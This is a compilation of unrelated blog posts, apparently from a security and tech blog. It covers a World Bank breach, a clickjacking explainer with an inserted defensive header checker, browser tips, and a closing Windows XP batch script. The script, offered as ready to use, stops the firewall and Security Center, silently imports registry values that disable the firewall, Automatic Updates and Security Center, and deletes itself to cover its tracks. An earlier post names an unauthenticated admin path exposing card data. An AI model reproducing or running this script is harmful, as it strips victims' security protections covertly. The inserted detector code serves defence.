Hackers Compromise the World Bank - Reflections on Indian IT Security

According to this article from USA Today, hackers broke into 18 servers at the World Bank and had access to, and possibly stole sensitive information from, at least 5 of the servers. Indian Banks have been relatively lucky, facing a majority of phishing/scam attacks rather than outright "Hack" attempts from skilled organized criminals such as these.



Throughout my time as a Security Professional whenever discussing Financial Fraud, Phishing and other attacks faced by Banks & Financial Institutions, I have always been of the opinion that they will soon face much more devastating attacks that will make the current attempts pale in comparison.



Why the pessimistic view? Well, it's simple.



Attackers have always been "creative", coming up with new and complicated schemes in order to get access to Credit-Card details and Banking Information. The reason they have the time and ability to do so is: Economics. The bottom line is that most of these attackers are walking away with fistfuls of money at the expense of Banks and their Customers.



If we consider a typical phishing scam, an attacker would send out a million e-mails (approximation). With a success rate of at best 1% (a very generous number considering that a good percentage would be picked up by Anti-Spam, Anti-phishing, Mistargeted Users, Smart Users etc.), they will walk away with 10000 working banking details.



If instead the attacker starts targeting servers belonging to Banks, systems belonging to Bank Employees and, more importantly, any of the thousands of Indian Shopping web-sites with Exposed Customer Information, SQL Injection vulnerabilities etc., they could walk away with 100K - 200K Credit-Card details or Banking Information.



As a matter of fact, last week, a colleague of mine ordered a product from one of the most popular Indian Shopping Portals. When the product was delivered, the label was a print-out invoice at the bottom of which was the URL: http://shopping-website/ecommerce/admin/vieworders.php. After typing this into the browser we were shown WITHOUT AUTHENTICATION plain-text Credit Card details, Order Information, Banking Details etc.



This for sure is one reason why I do not personally carry out Online Banking or Shopping, except maybe on Amazon.com or my Bank Account with Free Fraud Insurance.

What IS ClickJacking

ClickJacking is a relatively old vulnerability that has been around since 2003-2004; however, it has recently been brought back to life by Robert Hansen and Jeremiah Grossman. ClickJacking is a little bit difficult to explain, but try to imagine any button that you see in your browser: the Wire Transfer button on your Bank, the Post Blog button on your blog, the Add User button on your web-site etc. ClickJacking gives the attacker the ability to invisibly float these buttons on top of other innocent-looking objects in your browser. So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.



So while you are simply trying to close the JavaScript pop-up on your screen, play a Flash game or interact with some AJAX web-site -- you might really be clicking on the button to wire-transfer money to a Russian bank account.



A slightly more technical description would be: A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items,' 'click to add Bob as an admin,' etc. It may then provide its own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it.



In other words, the hacker would dupe users into visiting a malicious page -- through the usual methods -- but then hide the nasty bits under what appears to be the real-deal content from a legitimate site.
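The framing described above only works if the application in domain B lets other origins load it in an IFRAME. The check below is an added example, not part of the original post: it classifies responses by the `X-Frame-Options` and CSP `frame-ancestors` headers that browsers later introduced as the defence against this attack. The `bank.example` URLs and responses are constructed.

```javascript
// Added example (not from the original post). Sample responses are constructed.

// Return the frame-ancestors source list from a CSP value, or null if absent.
function frameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') return parts.slice(1);
  }
  return null;
}

// Classify how a response may be framed: 'deny', 'same-origin', 'allowlist' or 'framable'.
function framingPolicy(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  const sources = h['content-security-policy']
    ? frameAncestors(h['content-security-policy'])
    : null;
  if (sources !== null) {
    // Browsers that enforce frame-ancestors ignore X-Frame-Options when it is present.
    const s = sources.map(x => x.toLowerCase());
    if (s.length === 0 || (s.length === 1 && s[0] === "'none'")) return 'deny';
    if (s.some(x => x === '*' || x === 'http:' || x === 'https:')) return 'framable';
    if (s.every(x => x === "'self'")) return 'same-origin';
    return 'allowlist';
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'deny';
  if (xfo === 'SAMEORIGIN') return 'same-origin';
  // Missing header, or the obsolete ALLOW-FROM form that current browsers ignore.
  return 'framable';
}

// Constructed sample: state-changing pages of a hypothetical application.
const SAMPLE_RESPONSES = [
  { url: 'https://bank.example/transfer', headers: {} },
  { url: 'https://bank.example/admin/users', headers: { 'X-Frame-Options': 'SAMEORIGIN' } },
  { url: 'https://bank.example/settings',
    headers: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" } },
  { url: 'https://bank.example/widget',
    headers: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' } },
];

// URLs that another origin could load in an IFRAME and overlay.
function framableUrls(responses) {
  return responses.filter(r => framingPolicy(r.headers) === 'framable').map(r => r.url);
}

console.log(framableUrls(SAMPLE_RESPONSES));
```

The last sample shows a common misconfiguration: a permissive `frame-ancestors` takes precedence over a strict `X-Frame-Options`, so the page is still framable.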



How Serious is ClickJacking?

On its own, ClickJacking doesn't sound like a very serious vulnerability, since user interaction is required. However, as I have always said, in the world of vulnerabilities 1+1 does not always equal 2, and might just equal 10^2. By this I simply mean that ClickJacking in combination with other vulnerabilities could become a very serious issue.



Example - ClickJacking can Spy on your Webcam and Microphone

Just as I wrote this blog post, a new use for ClickJacking was disclosed, where it can be used to spy on your Microphone and Webcam. This is based on a new vulnerability discovered in Adobe's Flash Software and published on Guya.net, RSnake's Blog and Jeremiah Grossman's Blog.



A particular vulnerability exists in Adobe's Flash Software, which allows the malicious attacker to use ClickJacking to gain access to the user's web-cam and microphone.



The vulnerability works as follows:

1) You visit a web-page with a flash application/game embedded in it.

2) You click on the flash button.

3) Your click is "click-jacked" into allowing the server to access your web-cam and microphone.



What is really happening:

1) You visit the web-page; in the background the target application (in this case Adobe's Settings Panel) is loaded and made invisible. The Allow button is made to float invisibly.

2) While you click on the flash button, the invisible Allow button is floating on top of the flash button and actually receives your click.

3) The Flash application now has full permission to access your web-cam, microphone etc. and can even stream them to a server where the feed is recorded for future viewing.



You can see a video of this in action at: Youtube and Vimeo.

Check availability of your Username

Every one of us has a username on the sites we are a member of. And the reason why many of us have a unique online codename is just to maintain a single username as a matter of convenience, isn't it? Now in this Web 2.0 world, we may sometimes come across a service on which our username is already taken by someone. So today I am sharing a service named UserNameCheck which lets you know the availability of your username across several sites.



So use this service to check the availability of your username and get yourself those which are still available, so as to represent yourself uniquely with a single username. It's very important in branding yourself. Moreover, you can use this to find a unique username that doesn't exist on these services.

                                                            

Save youtube videos directly from Firefox3 cache

Open the youtube video page in firefox 3. Allow the video to play once.





Now the video is finished playing. Open a new tab in firefox 3. In the location bar (address bar) type



about:cache



and press enter. A new page will load. In the page see the heading



Disk cache device



Under that there is “Cache Directory”. There will be a long address similar to one shown below



C:\Documents and Settings\usrname\Local Settings\Application Data\Mozilla\Firefox\Profiles\abcd123h.default\Cache





Copy the full address (You must copy the cache link address from your computer. The above address is just to show and make you understand). Now open “My Computer”. In the address bar paste the already copied long address.



A folder will open. This folder contains the youtube video file in the form of cache. Note that the video file will be big in size. Now open VLC Media player or any other flv player. Drag and drop the bigger cache file into the media player. The file that plays the video is your video file. Copy and paste it to the desktop. Rename the file to yourvideo1.flv (or any other name of your choice with the flv extension).



Now you have saved the youtube video right from your firefox 3 cache rather than downloading it again.



You can watch the saved video while offline.



Tested in WinXP, Firefox3

Free Domain Redirections


Google Chrome Tips, Tricks, Hacks and Shortcuts

1. Create application shortcut : Create desktop and Start menu shortcuts to web apps such as Gmail - go to Gmail.com and then select  from the Page Control menu (in the top-right corner of your browser - it looks like a page with the corner folded over). Now choose where you want to place your shortcut. This works for other Google apps such as Calendar and Documents, and other services such as Windows Live Hotmail.

2. Control + Shift + N opens an ‘incognito’ window - sites you view in this window won’t appear in your history and cookies served by sites in this window will be deleted when the window is closed.

3. You can open a link in an incognito window by right-clicking the link and selecting Open link in incognito window.

4. Alt + Home loads your Google Chrome home page, with thumbnails of your most visited sites shown in the active tabbed window.

5. Control + T opens a new tab. You can drag tabs around to change their order or drag a tab out of the window into its own window.

6. Control + Shift + T opens your most recently closed tab. Press the key combination again to open the tab closed before that one. Google Chrome remembers the last 10 tabs you’ve closed.

7. Jump to different open tabs using Control + 1, Control + 2, Control + 3, etc. Control + 9 takes you to the last tab.

8. Control + Tab lets you cycle through your open tabs in order.

9. Control + Shift + Tab cycles through your tabs in the opposite order.

10. As with Firefox 3, you can drag a link onto a tab to open it in that tab, or drop it between two tabs to open a new tab in that position.

11. To bookmark a site click the star on the left of the address bar and then select a folder to add it to.

12. Control + B hides the Google Chrome bookmarks bar. Press Control + B to bring it back again.

13. Right-click or hold down the back button and you’ll get a drop-down list of sites to go back through. Show Full History, at the bottom of the list, opens a new tab with your full browser history.

14. Control + H is a faster way to bring up the History page.

15. You can delete history for chosen days by scrolling to the day you want to delete and clicking Delete history for this day on the right-hand side of the window.

16. Control + J brings up your Downloads page.

17. To clear an item from your Downloads page, right-click an entry and select Remove.

18. Press Control + K or Control + E to search from the address bar. Once pressed, you’ll see a ? symbol appear in the address bar and you can simply enter your search query and hit Return.

19. Right-click the top of the browser window and select Task manager to see how much memory different tabs and plug-ins are using. Highlight one and click End process to stop it running.

20. Shift + Escape is a quicker way to bring up the Google Chrome Task manager.

21. To see what plug-ins are installed, type about:plugins into the address window.

22. You can also type the following commands into the Google Chrome address window: about:stats, about:network, about:histograms, about:memory, about:cache, about:dns.

23. Type about:crash to see what a crashed tab looks like.

24. A three-second diversion: type about:internets. (Only works in Windows XP.)

25. Edit any web page - right-click a page and select Inspect element. Now edit the HTML source code and hit Return to view the changes.

26. To make Google Chrome your default browser, click the Tools button (in the right-hand corner of the browser window - a spanner icon). Select Options, click the Basics tab and then click the Make Google Chrome my default browser button.

27. To delete cookies, go to Tools > Options > Under the Hood. Scroll down to the Security section, and click Show cookies. Now you can click Remove all or remove individual cookies.

28. To clear more data such as the Google Chrome browsing history and cache, click the Tools icon and select Clear browsing data…

29. To clear the most visited web sites that appear on your Google Chrome start page, you must clear your browsing history using the method above.

30. Clearing your Google Chrome browser history will also stop matches from previously browsed sites appearing as suggestions in your address bar.

Batch File To Disable Firewall-Windows Xp Sp2

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0



Shuts down Windows Firewall, disables Automatic Updates for the next reboot.

And no, Microsoft is not going to fix this. This code will work when it goes live.
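A defender-side check for the change this script makes, added here as an example and not part of the original post: it scans a registry export for the three service keys the script writes and reports those whose `Start` value is 4 (disabled). The export text and the `ExampleSvc` key are constructed.

```javascript
// Added example (not from the original post). The export below is constructed.

// Services the batch file on this page sets to Start=4 (disabled).
const WATCHED = ['sharedaccess', 'wuauserv', 'wscsvc'];
const KEY_RE =
  /^\[HKEY_LOCAL_MACHINE\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Services\\([^\\\]]+)\]$/i;
const START_RE = /^"Start"=dword:([0-9a-f]{8})$/i;

// Return "<control set>\<service>" for every watched service that is disabled.
function disabledSecurityServices(regText) {
  const findings = [];
  let current = null; // watched service key we are inside, if any
  for (const raw of regText.split(/\r?\n/)) {
    const line = raw.trim();
    if (line.startsWith('[')) {
      const key = KEY_RE.exec(line);
      current = key && WATCHED.includes(key[2].toLowerCase())
        ? `${key[1]}\\${key[2]}`
        : null;
      continue;
    }
    const start = START_RE.exec(line);
    if (current && start && parseInt(start[1], 16) === 4) findings.push(current);
  }
  return findings;
}

// Constructed export: two watched services disabled, one still automatic,
// and one unrelated disabled service that must not be reported.
const SAMPLE_EXPORT = String.raw`REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleSvc]
"Start"=dword:00000004
`;

console.log(disabledSecurityServices(SAMPLE_EXPORT));
```

The key pattern accepts numbered control sets as well as `CurrentControlSet`, because the script writes the `wscsvc` value under `ControlSet001`.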